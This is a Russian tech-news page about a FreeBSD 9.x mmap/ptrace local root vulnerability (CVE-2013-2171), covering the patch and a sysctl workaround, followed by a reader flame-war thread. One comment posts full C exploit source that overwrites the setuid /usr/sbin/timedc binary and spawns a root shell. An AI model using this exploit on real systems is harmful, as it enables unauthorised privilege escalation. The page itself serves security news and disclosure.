The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Опасная локальная уязвимость в реализации mmap из состава FreeBSD 9

18.06.2013 23:25

Во всех выпусках FreeBSD 9.x выявлена уязвимость в реализации виртуальной памяти, при успешной эксплуатации позволяющая локальному злоумышленнику повысить свои привилегии в системе. Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного кода с пользовательскими привилегиями. Проблема может привести к неавторизированной модификации произвольного файла к которому атакующий имеет доступ на чтение, но в обычных условиях не имеет доступа на запись.

Ошибка связана с отсутствием должных проверок доступа при трассировке приложений. В частности, процесс осуществляющий трассировку (например, отладчик) может получить права доступа к областям памяти трассируемого процесса, к которым у самого трассируемого процесса нет доступа (например, используя mmap для доступного только на чтение файла, можно получить доступ на запись к связанным с данным файлом областям памяти). Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до 9.1-RELEASE-p4 или 9.1-STABLE.

Дополнение 1: доступен эксплоит для проверки системы на наличие уязвимости.

Дополнение 2: в качестве обходного пути защиты от проявления уязвимости достаточно запретить непривилегированным пользователям выполнение ptrace - "sysctl security.bsd.unprivileged_proc_debug=0".

  1. Главная ссылка к новости (http://lists.freebsd.org/piper...)
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/37206-freebsd
Ключевые слова: freebsd
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (65) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Inome (ok), 23:54, 18/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +8 +/
    эх, хорошо всё-таки, что не побежал обновляться до 9 :)
     
     
  • 2.3, iZEN (ok), 00:06, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –9 +/
    Можно подумать, что это очень сложно.
     
     
  • 3.12, Аноним (-), 01:54, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    долго пересобирать, если нету ip-kvm то это IMPOSSIBRU!
     
     
  • 4.14, 80е (?), 02:09, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> если нету ip-kvm то это IMPOSSIBRU!

    Если нету ip-kvm то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :) :)

     
     
  • 5.16, Аноним (-), 04:00, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, а демоны у вас под какими пользователями работают? Сразу под рутом, чтобы хацкерам даже мучаться с дырками не надо было? :)
     
     
  • 6.20, 80е (?), 05:15, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Вы читаете то, что комментируете?
    Я имею ввиду описание уязвимости.
     
     
  • 7.37, Аноним (-), 13:55, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Я имею ввиду описание уязвимости.

    Да, и там написано:

    > Для эксплуатации уязвимости атакующий должен иметь возможность выполнения произвольного
    > кода с пользовательскими привилегиями.

    Для тех кто на бронепоезде (бсдшники, то-бишь), поясняю: локальный пользователь - только в том плане что это не ремотное поимение по сети, а "лишь" "локальным" кодом выполняемым на машине. А как именно залогинен пользователь, через KVM или там как демон какой-то - да пофигу скорее всего. А что, есть какая-то большая разница откуда трассировочные вызовы дергать? Очень сомнительно.

    Хотя, если вам хочется публично лохануться, показав всему миру что вы дуб дубом и не понимаете что такое системные вызовы и как это работает - окей, nice try!

     
     
  • 8.48, 80е (?), 05:30, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Вос-с-спидя От ты ты дурачок сельскохозяйственный ... текст свёрнут, показать
     
     
  • 9.56, Аноним (-), 15:34, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Да, наверное рассаду у вас лучше будет получаться выращивать Самокритика засчит... текст свёрнут, показать
     
  • 5.29, Andrey Mitrofanov (?), 10:28, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Если нету ip-kvm

    Ты пропустил:

    "", нет запущенных сетевых сервисов, нет ключа от серверной, нет <...я.тоже.чего-то.пропустил...>

    > то НЕТУ И ЛОКАЛЬНЫХ ПОЛЬЗОВАТЕЛЕЙ ! :)  :)  :)

     
     
  • 6.38, Аноним (-), 13:56, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    И главное - питание к серваку не подключать!
     
  • 6.49, 80е (?), 06:34, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?
     
     
  • 7.57, Аноним (-), 15:35, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > запущенный сетевой сервис — системный процесс, а не «локальный пользователь»?

    И чем он отличается в плане дергания сисколов от процессов "локального пользователя" к которому вы прикопались?

     
  • 2.4, IMHO (?), 00:07, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –2 +/
    хорошо что ее нашли и исправили, а там уже как хочешь так и обновляйся или нет, уязвимость то локальная
     
     
  • 3.28, SubGun (ok), 10:24, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Но может быть реализована через другую уязвимость.
     
  • 3.30, Нанобот (?), 10:48, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    было б странно, если б нашли и не исправили
     
  • 3.39, Аноним (-), 13:57, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > и обновляйся или нет, уязвимость то локальная

    Ага, только это заканчивается тем что через вебню сначала хаксор просто вламывается и получает права пользователя. Потом апгрейдит их через что-то такое до рута. А потом ищи его свищи, когда там руткит половину сисколов переколбасил...

     
  • 2.50, друг iZEN (?), 09:33, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ ДА И ТОЛЬКО
     
     
  • 3.51, Клыкастый (ok), 10:28, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Думать что тебя не атакуют каждый день - это раздолбайство. Атакуют. Каждый день.
     
  • 3.53, arisu (ok), 11:44, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > да уж блиинннннн - ужас!!!! МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!, СМЕХ
    > ДА И ТОЛЬКО

    если бы у тебя стояли хоть какие-то сервера на бсд и ты умел читать логи (я понимаю, что это два совершенно невероятных предположения), то ты узнал бы много интересного.

     
  • 3.58, Аноним (-), 15:36, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > МОЖНО ПОДУМАТЬ ВАС АТАКУЮТ КАЖДЫЙ ДЕНЬ!

    Если бы у тебя был сервер вывешенный в интернет и ты умел читать логи, ты бы узнал очень много интересного на этот счет.

     

  • 1.2, IMHO (?), 00:06, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Всем пользователям FreeBSD 9.x рекомендуется как можно скорее произвести обновление системы до 9.1-RELEASE-p4 или 9.1-STABLE.

    спасибо, так и сделаю

     
     
  • 2.5, FSA (ok), 00:14, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Точно, пока ночь, надо машинку перезагрузить.
     
     
  • 3.15, 80е (?), 03:14, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –2 +/
    И где взять?

    ../release/9.1.0/ и ../releng/9.1/
    и там, и там — МУСОР.

    Как это уже было при переносе портов с CVS на SVN.
    Ща та же красота в BASE :)
    В SVN — мусор, в CVS — ТОЖЕ МУСОР :)

    Получить -p4 низзя :)

     
     
  • 4.21, kshetragia (ok), 05:56, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    freebsd-update? не?
     
     
  • 5.34, 80е (?), 13:20, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >> freebsd-update? не?

    да, но это НЕ ПОПС.

    Хотелось бы сдуть древо /usr/src

     
     
  • 6.40, Аноним (-), 13:58, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Хотелось бы сдуть древо /usr/src

    А что, rm у вас сломался? :)

     
  • 4.26, тигар (ok), 10:01, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    releng/9.1
    там не мусор, там код, если чо. и да, -p4. я проверил

    r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) | 9 lines
    Changed paths:
       M /releng/9.1/UPDATING
       M /releng/9.1/sys/conf/newvers.sh
       M /releng/9.1/sys/vm/vm_map.c

    Fix a bug that allowed a tracing process (e.g. gdb) to write
    to a memory-mapped file in the traced process's address space
    even if neither the traced process nor the tracing process had
    write access to that file.

    Security:       CVE-2013-2171
    Security:       FreeBSD-SA-13:06.mmap
    Approved by:    so


    p.s. а в base (head) запихали svn[lite] и вынесли cvs :)

     
     
  • 5.35, 80е (?), 13:27, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > releng/9.1
    > там не мусор, там код, если чо. и да, -p4. я проверил
    > r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
    > 9 lines
    > Changed paths:
    >    M /releng/9.1/UPDATING
    >    M /releng/9.1/sys/conf/newvers.sh
    >    M /releng/9.1/sys/vm/vm_map.c

    И вы знаете, — Я В КУРСЕ :) :) :)
    Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

    А в SVN — именно МУ СОР
    Ибо ни команда
    svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
    ни команда
    svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

    набузыпив по мильену строк в /usr/src/.svn, — НЕ обновляют вот этих три
    >    M /releng/9.1/UPDATING
    >    M /releng/9.1/sys/conf/newvers.sh
    >    M /releng/9.1/sys/vm/vm_map.c

     
     
  • 6.36, тигар (ok), 13:35, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    >> releng/9.1
    >> там не мусор, там код, если чо. и да, -p4. я проверил
    >> r251903 | des | 2013-06-18 10:05:51 +0300 (вт, 18 июн 2013) |
    >> 9 lines
    >> Changed paths:
    >>    M /releng/9.1/UPDATING
    >>    M /releng/9.1/sys/conf/newvers.sh
    >>    M /releng/9.1/sys/vm/vm_map.c
    > И вы знаете, — Я В КУРСЕ :) :) :)
    > Осталось НЕ РУЧКАМИ сдуть эти изменения в /usr/src

    ну, если вместо того, чтобы узнать о существовании update, ну и вообще научиться пользоваться vcs, тренировать пальцы набирая смайлики... то да, "мусор"
    > А в SVN — именно МУ СОР
    > Ибо ни команда
    > svn co svn://svn.freebsd.org/base/releng/9.1/ /usr/src
    > ни команда
    > svn co svn://svn.freebsd.org/base/release/9.1.0/ /usr/src

    особенно доставила вторая попытка "обновиться" до -p4 из release/9.1.0. что, на лыссяре нет хаутушек как работать с svn и это делает тебя грустной пандой ?


     

  • 1.18, Аноним (-), 04:04, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • –7 +/
    > Ошибка связана с отсутствием должных проверок доступа при трассировке
    > приложений. В частности, процесс осуществляющий трассировку (например,
    > отладчик) может получить права доступа к областям памяти трассируемого
    > процесса, к которым у самого трассируемого процесса нет доступа

    Феерично, чо. А у "лyноходов" даже в бyбунте обычной - тот кто не рут просто не может трейсить процессы, ибо постоянный источник проблем.

    Вот как-то так и получается что ламерская бyбунта - секурнее пальцатой фрибзды. Чудеса, да? :)

     
     
  • 2.23, Аноним (-), 06:23, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +6 +/
    sysctl security.bsd.unprivileged_proc_debug=0 ы?
     
     
  • 3.24, linux must __RIP__ (?), 08:26, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..
     
     
  • 4.27, Andrey Mitrofanov (?), 10:22, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > нельзя же так срезать :) недавно как раз в linux была дыра
    > которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через
    > sysctl..

    Нудк, теперь она есть и в твоей уютненькой.

     
     
  • 5.31, BayaN (ok), 11:42, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Нудк, теперь она есть и в твоей уютненькой.

    Портировали сволочи! И как всегда с опозданием.


     
     
  • 6.43, Аноним (-), 14:04, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Портировали сволочи! И как всегда с опозданием.

    Вопрос то не в портировании а в дефолтах. Вот ты при установке системы всегда прописываешь это? Нет? Тогда хренли толку с этого sysclt, если 90% обормотов которые пользуют BSD узнали о его существовании из этого поста? :)

     
  • 4.42, Аноним (-), 14:01, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > нельзя же так срезать :) недавно как раз в linux была дыра
    > которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

    Дядь, если ты не рут и пытаешься ptrace() - тебя просто сразу же и заворачивают. Совсем. Как это обойти то можно? :)

     
  • 3.41, Аноним (-), 14:00, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > sysctl security.bsd.unprivileged_proc_debug=0 ы?

    Только у бyбунтоидов и прочих это по дефолту. А у вас - думаете, нагуалы, тигары и прочие изены дотумкают это сделать без посторонней подсказки? Давайте поспорим что у них это не прописано и дырка эталонно работает, а? :)

     
     
  • 4.74, тигар (ok), 17:14, 21/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    на что спорить будем?

    O.T. Мишенька, ты снова заболел, нельзя так, Шигорин.

     

  • 1.32, ALex_hha (ok), 12:08, 19/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    > нельзя же так срезать :) недавно как раз в linux была дыра которая позволяла обходить ограничения ptrace.. и которую никак не закрыть через sysctl..

    вообще то легко лечилась правкой sysctl ;)

    # sysctl kernel.perf_event_paranoid=2

     
     
  • 2.33, whaddup (?), 12:09, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Вообще-то не лечилось.
     
     
  • 3.44, anonymous (??), 14:19, 19/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ну и где сейчас фря и где линукс?
     
     
  • 4.45, zombardeer (?), 00:15, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    на серверах. ну и лялих на дескттопах. немножко.
     
     
  • 5.46, arisu (ok), 00:18, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > на серверах.

    на всех четырёх!

     
     
  • 6.47, Фтщтнь (?), 01:45, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >> на серверах.
    > на всех четырёх!

    На 24х... Ну лично у меня. А у вас я не знаю как там. Собственно тонко подвожу вас к тому, что понимание происходящего в объективной реальности  ограничено исключительно вашими же представлениями о нем.

     
     
  • 7.52, arisu (ok), 11:03, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    а я намекаю, что по сравнению с пингвинусом разница между четырьмя, двадцатью четырьмя, двухсот сорока четырьмя — неразличима.
     
     
  • 8.63, andrew0snake (?), 20:49, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    двумястами сорока четырьмя так-то И вообще люди, что делают выбор в пользу ис... текст свёрнут, показать
     
     
  • 9.65, arisu (ok), 21:30, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    да, виноват с местными грамотеями уже и 1038 скоро буду с тремя ошибками пис... текст свёрнут, показать
     
     
  • 10.66, Аноним (-), 22:47, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    1038 X - новое обозначение для User eXperience ... текст свёрнут, показать
     
  • 7.59, Аноним (-), 15:37, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > На 24х... Ну лично у меня.

    Думаете, ваши 24 сервака делают погоду на фоне миллионов? А большие конторы уже более-менее усвоили что жрать кактус смысла мало, при наличии более съедобных и удобных альтернатив.

     
     
  • 8.61, Фтщтнь (?), 15:50, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    Отучаемся говорить за всех ... текст свёрнут, показать
     
     
  • 9.67, Аноним (-), 23:02, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    А что - всех За них статистика уже все сказала ... текст свёрнут, показать
     
     
  • 10.73, Фтщтнь (?), 05:14, 21/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Простите, не удержался... текст свёрнут, показать
     
     
  • 11.75, Led (ok), 21:01, 22/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    А теперь на то, что ты не удержался , слетится миллионы мух Родители не учил... текст свёрнут, показать
     
  • 3.54, ALex_hha (ok), 12:21, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Вообще-то не лечилось.

    если руки кривые, то не лечилось ;)

     
     
  • 4.62, whaddup (?), 17:00, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    У кого-то мозги кривые. Обход этой настройки требовал исправления всего 1 байта в исходном коде сплойта.
     

  • 1.55, pavlinux (ok), 13:24, 20/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/



    /*
    * FreeBSD 9.{0,1} mmap/ptrace exploit
    *
    * Happy Birthday FreeBSD!
    * Now you are 20 years old and your security is the same as 20 years ago... :)
    *
    */

    #include <err.h>
    #include <errno.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <fcntl.h>
    #include <sys/stat.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/ptrace.h>
    #include <sys/wait.h>

    #define SH "/bin/sh"
    #define TG "/usr/sbin/timedc"

    int
    main(int ac, char **av) {
       int from_fd, to_fd, status;
       struct stat st;
       struct ptrace_io_desc piod;
       char *s, *d;
       pid_t pid;

       if (geteuid() == 0)  {
            setuid(0);
            execl(SH, SH, NULL);
            return 0;
       }

       printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");

       if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
            (to_fd = open(TG, O_RDONLY)) == -1)
                    err(1, "open");
    if (stat(av[0], &st) == -1)
            err(2, "stat");

       if (((s = mmap(NULL, (size_t)st.st_size, PROT_READ,
            MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                    (d = mmap(NULL, (size_t)st.st_size, PROT_READ,
                            MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                    err(3, "mmap");

       if ((pid = fork()) == -1)
            err(4, "fork");

       if (!pid) {
            if (ptrace(PT_TRACE_ME, pid, NULL, 0) == -1)
                    err(5, "ptraceme");

            return 0;
            }

       if (ptrace(PT_ATTACH, pid, NULL, 0) == -1)
            err(6, "ptattach");

       if (wait(&status) == -1)
            err(7, "wait");

       piod.piod_op = PIOD_WRITE_D;
       piod.piod_offs = d;
       piod.piod_addr = s;
       piod.piod_len  = st.st_size;

       if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
            err(8, "ptio");

       execl(TG, TG, NULL);

       return 0;
    }



     
     
  • 2.60, Аноним (-), 15:38, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >  * Now you are 20 years old and your security is the same as 20 years ago... :)

    Дожили, секурити фрибзды троллят даже в эксплойтах :)

     
     
  • 3.64, andrew0snake (?), 20:53, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >>  * Now you are 20 years old and your security is the same as 20 years ago... :)
    > Дожили, секурити фрибзды троллят даже в эксплойтах :)

    На то ж они и тролли, чтоб троллить, а не находить эти уязвимости. И тем более не устранять)

     
     
  • 4.68, Аноним (-), 23:03, 20/06/2013 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > На то ж они и тролли, чтоб троллить, а не находить эти
    > уязвимости. И тем более не устранять)

    Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию шеф-повара.

     
     
  • 5.71, тигар (ok), 00:11, 21/06/2013 [^] [^^] [^^^] [ответить]  
  • –2 +/
    >> На то ж они и тролли, чтоб троллить, а не находить эти
    >> уязвимости. И тем более не устранять)
    > Для того чтобы констатировать что "жрачка-дрянь!" совершенно не обязательно иметь квалификацию
    > шеф-повара.

    привыкшим жрать исключительно говно^W^W^Wпользоваться только линаксом (убунту?) совсем не обязательно видеть что-то отличное от, чтобы орать "жрачка-дрянь!" да.

     
  • 2.70, тигар (ok), 00:09, 21/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    типичный луноход детектед. копирайты вырезаны, оригинальный линк не приведен. сделаю это за тебя, не благодари:
    http://seclists.org/fulldisclosure/2013/Jun/161
     
  • 2.72, тигар (ok), 00:14, 21/06/2013 [^] [^^] [^^^] [ответить]  
  • –1 +/
    и да, псто откуда ты с3.14здил эксплоит (а чо свой копирайт не поставил-то?;)) от 19го, а закрыли дыру 18го.
     

  • 1.76, StainlessRat (??), 21:25, 25/06/2013 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Всегда говорил: FreeBSD - Серверная платформа. Мастдай, и прочая хня - от лУКАВОГО. А локальная уязвимость... Так нех... пускать на сервер юзверей :)
     
     
  • 2.77, Andrey Mitrofanov (?), 21:50, 25/06/2013 [^] [^^] [^^^] [ответить]  
  • +/
    > Всегда говорил: FreeBSD
    >Так нех... пускать на сервер юзверей :)

    И IP соединеия снаружи. И соединеия *наружу*. И электричество из _сети_. </fbsd security>

     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2024 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру